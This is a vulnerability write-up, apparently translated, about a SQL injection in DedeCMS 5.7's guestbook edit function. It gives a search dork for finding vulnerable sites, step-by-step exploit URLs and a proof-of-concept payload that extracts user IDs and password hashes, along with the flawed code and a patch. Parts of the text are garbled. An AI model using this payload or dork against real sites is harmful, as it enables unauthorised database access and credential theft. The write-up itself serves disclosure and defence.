Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

The following conditions are required for successful injection of vulnerabilities

1. php magic_quotes_gpc=off2. The vulnerability file exists: plus/guestbook.php3. In the database: Dede_guestbook also needs to exist

Relevant Link:

inurl:/plus/guestbook.php

2. Vulnerability Trigger Condition

1. http//localhost/dedecms5.7/plus/guestbook.php2. The ID of the visitor's message can be found on [Reply/edit]. Then note the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=13. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc ' &id=14. After submission, if it is a dede5.7 version, it will appear"successfully change or reply to a message", it proves the change was successful.5. Back to: http://localhost/dedecms5.7/plus/guestbook.php, look at the change of the message whether the content has become errs.cc ' if so, it proves that the vulnerability could not be exploited should be opened for him: Php MAGIC_QUOTES_GPC =off6If no modification succeeds, the content of the message ID is still previous, which proves that the vulnerability can be exploited. 7. Then visit again: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg= ', Msg=user (), email= ' 8. Then return, the content of the message ID is directly modified to the MySQL user ().

relevant Link:

http://www.51php.com/dedecms/16942.htmlhttp://www.wooyun.org/bugs/ wooyun-2012-014501

3. Vulnerability Impact Range

0x1:poc

View Sourceprint? 1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=', [email Protected] ", msg= (SelecT CONCAT (userid,0x7c, pwd) from '%0,1) , email='

Relevant Link:

http://www.programgo.com/article/45492569994/http://www.cnblogs.com/Hkadmin/p/ 3712667.html

4. Vulnerability Code Analysis

/plus/guestbook.php

// Modify Message if ($action = ='admin') {    include_once (dirname (__file__). ' /guestbook/edit.inc.php ' );    Exit ();}

\plus\guestbook\edit.inc.php

//instead of judging $g_isadmin, we mistakenly trust the user's input: action = "Admin"Else if($job = ='Editok') {$remsg=trim ($remsg); //There is no filter for $msg, which can be injected arbitrarily$dsql->executenonequery ("Update ' #@__guestbook ' Set ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' where id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}

Relevant Link:

http://pannisec.diandian.com/?tag=sql%e6%b3%a8%e5%b0%84

5. Defense Methods

\plus\guestbook\edit.inc.php

Else if($job = ='Editok') {$remsg=trim ($remsg); /*Verify $g_isadmin*/    if($remsg! ="')    {        //Admin reply does not filter HTML        if($g _isadmin) {$msg="<div class=\\ ' rebox\\ ' >". $msg."</div>\n". $remsg; //$remsg <br><font color=red> Admin reply:</font>        }        Else{$row= $dsql->getone ("SELECT msg from ' #@__guestbook ' WHERE id= ' $id '"); $oldmsg="<div class=\\ ' rebox\\ ' >". addslashes ($row ['msg'])."</div>\n"; $remsg= Trimmsg (CN_SUBSTRR ($remsg,1024x768),1); $msg=$oldmsg. $remsg; }    }    /* */    /*effective filtering of the $msg*/$msg=addslashes ($msg); /* */$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg ', ' posttime ' = '". Time ()."' WHERE id= ' $id '"); ShowMsg ("successfully change or reply to a message! ", $GUEST _book_pos); Exit ();}

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

Dedecms \plus\guestbook.php SQL injection Vul by \plus\guestbook\edit.inc.php